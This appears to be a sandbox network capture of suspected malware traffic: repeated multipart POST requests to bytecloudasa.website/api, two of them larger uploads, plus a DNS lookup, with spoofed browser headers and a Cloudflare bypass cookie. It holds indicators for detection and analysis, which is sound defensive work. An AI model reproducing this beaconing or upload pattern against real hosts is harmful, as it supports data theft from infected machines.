CF-RAY: 814478ec5c1c0b32-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6pvakq98regebcjq2i041aq89e; expires=Sat, 03 Feb 2024 22:35:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i7KQIdotXcz5A%2BEi1NRt3ZqaZ4dweVu8pbXdaBWirSRiwSOKpXQau8JsLedDedviClRP5rVzQ0Ulbxd5BdOwY2cRiKZfDXo3DfYMIc%2BoNm0bnfNesdV%2BlRTrLvQLPxpZFjwMlZLu%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478eddf080ead-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=vomusjqisem0k0e0ref3t08nc4; expires=Sat, 03 Feb 2024 22:35:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8Tn5wMDjNArbmnaiJbZR6%2Bkvrau2q%2FfvuyeuSLMwDlV2QBqwz4fUhoaRx64eVjzvYWcPlNawyzXnsnrRpzecHV%2BWHEQyXNhMdvK%2B4yCUSFYqdqz5jC3U7ybqM8dVdvF%2FQdvo670VDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478eedbaab963-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=e6psbo2c191aldmkm1e5ufbbhn; expires=Sat, 03 Feb 2024 22:35:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8EqTe8q8GB%2FNHP0T11PKszm8y7LnQj2HWMKJRiSZfa6mtJNZNYT5dmYgOpCgOZhBYlsFt19O0dqIWqKZiaf%2BCUrfiX%2FAJ6g4WAiy55zoTVV3i5z9tYoJeFgsx5MxqWzaLbAT74K2rQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478efeba0b96e-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=pve0e7g3618nsinp50k7f6rolm; expires=Sat, 03 Feb 2024 22:35:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x7EdNFJNTboiCbxZY%2F7CofBLORpiT4imbVBntC7i7OkreHK8Ih%2B%2FqCRc4ORdX68dWg1YlJ62wFI131AL9w%2FMjHjtAdTx0erPdvUA1TUCvvNEYZs4iWTYBTU7bqXAJ42R2xkz%2BuaPsA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478f07d9b0b8e-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nkv0p1p460p83cg42p7hd9ghqh; expires=Sat, 03 Feb 2024 22:35:22 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:43 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vu6iW0NG3%2BCdMa9GdWYVV16SSNbYe5A49IL3kNdnbXH%2BWx5vmfnwwjVYr0kn2HuoE8uaApC7fjhYr4R6%2BOyghWom6Ju2Ou18H0tWYcBmEwwvfoRxZ1qARSWGKPBAim72USbz9oDhwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478f22dc60bea-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=mucbj21itae84rca9eqeh17o30; expires=Sat, 03 Feb 2024 22:35:23 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:44 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y6frE6kdZsHU%2Bz83N7250UjpXiqCoJz6%2BhmPNj42hj92m22nTPQ6YFEhWV%2BhLUdwo2TNllECSm%2F0EBNU1LG%2Fv5uGTTb4uq6uTbfWdlRx%2F55DuSa7uDgFUJCrosphGjtuwFJD%2FSi%2FAg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478f3ca1a6624-AMS
DNS

bytecloudasa.website

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16476
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=eep4lov45io48u32uf0j95o6ba; expires=Sat, 03 Feb 2024 22:35:24 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:45 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u7qPbRWjYVFcdB4reXg8ImZbm2BO615N43mhVUewtV8XzvHjVEb6Ylw8aG%2BqZafHlEtA4DtFGw%2BfxivsCEqGqmFqRx7dYNNkn%2BopJ%2FtXXkKxAzxO8%2B6J0e0PeRhtPgy170c2fRLnqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478f7e80ab77f-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=l7pm4kahj0v505atrbnrd7me0n; expires=Sat, 03 Feb 2024 22:35:24 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:45 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v96z%2FBBv9MHBl7%2FwWZ0b7pp%2FVoVH88lXGNk68IaLZRTR3Sp7bTWibWwI3BSAuknapzVLlVUNmZ95RPpZH1Q8Q%2FU9N5%2BMnJ%2Bv39bE8VeLNd2rFHn0MhD17Y%2ByVTtfX79s8Zq8hkb7GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478fd1dcfb98e-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=q7fcpefgpaogoksuiu04tkpepb; expires=Sat, 03 Feb 2024 22:35:25 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:46 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xR7aoAX7O6HrlbSrpKe3dQmpmD3R2GXbcjjXJ1MJ59%2BJXU7hwBXP%2BwYdmD2rKPlrUD64D4AMDKVfslPPcbfcRGMspDIF2XCsVzkId%2F0uVJysTmJcIH29DwrUR5zg3qVgJujcXwssww%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478fe9826b89a-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=mgj78lm8gov3thij6vtiv3b91l; expires=Sat, 03 Feb 2024 22:35:26 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:47 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sNJD4ub1TrWMOmIqROV93g3hWXuchSjYxivx1UZJT0BH%2BJjtS01PdZYjts8CXUJeL2iF1km71lqsKAkHPG10MqqZK4HjiIL%2Fk2dovcAS47%2FVbjWmLNPB3HFbLekltLK5Vjo6Q44A4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8144790918431c92-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ttoug6euo4f9l5j1muvp8neu0m; expires=Sat, 03 Feb 2024 22:35:26 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:47 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TBIRz%2F8v15qPEeUGWk6mIhUDAIrSBQCN9h4dMJdWj5P4X7G1kv0S0jsWe2c5qdYuWcUP%2BuuNwES3jfx1vDh82ywtPpWG6k2iPc3HS4xUjOR%2FESLE%2Bn9gZlmPxtJiiLjG%2B0JnDsczKw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8144790a1ac10a54-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=a678e25jhamr2sqsqbq3afl1qr; expires=Sat, 03 Feb 2024 22:35:27 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:48 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Jxz%2F9%2BGRbli90i0mFuIt1qLjPPVEqpOXBxjFOQ%2B11RaJjVth3wP5qN9CeYbDwmxTUmD1xCmRc2wP1LiL%2Fpht%2FZndNKqD42xhpnwfaY4WhG9vnmAQn%2F2enBrjHQB0HRX7yOBM48arA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8144790afe95b99a-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17442
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=v6n9mdhb5qrpgri8536nod9smj; expires=Sat, 03 Feb 2024 22:35:28 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:49 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IeChCaoBf6D%2BVemOB92G588PNNsqw%2FN90N7lafd14EYZ7FlC6Pgbc%2FPP%2BbZJoT7m4WYMUvklsbIaBxk0xM73WUc574ODHDHXqVstHjNrRgRIHdXqOQqprP6UM4PVYRwZGxgrbaBqRg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81447913bdcf06c8-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nsstkf7gh84rvi2f660to2qinh; expires=Sat, 03 Feb 2024 22:35:31 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:52 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qCwKQMhqXnMZ4RtDUe%2BOUnhi0AhqetOsUpGlYwgQMxuJ3sQJk57sUvGWPFGbsYQ33zdVnEP3MUL8HVydv1VvHyhIPiXBF%2B8vQAkOyHmFpqYarQDD1hnJxVL5adMo%2BXWE0eBRdmHm%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81447926b8fd0b4c-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9uf3dmkhmn9fhkkodg1ecbdesp; expires=Sat, 03 Feb 2024 22:35:31 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:52 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m2EGKp75HJjdnbXG40z4UYvrCGmZGhAOO%2BlOm6f6u4HCu7%2BX8ij5c%2BixfOm7CPtcaaVAuxY5QeGuZkdLvv8NQH0VfuCMnHEyYxjkc8zBYFp6F097YyYNuqJBEXW9xTO5HGABya6lAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
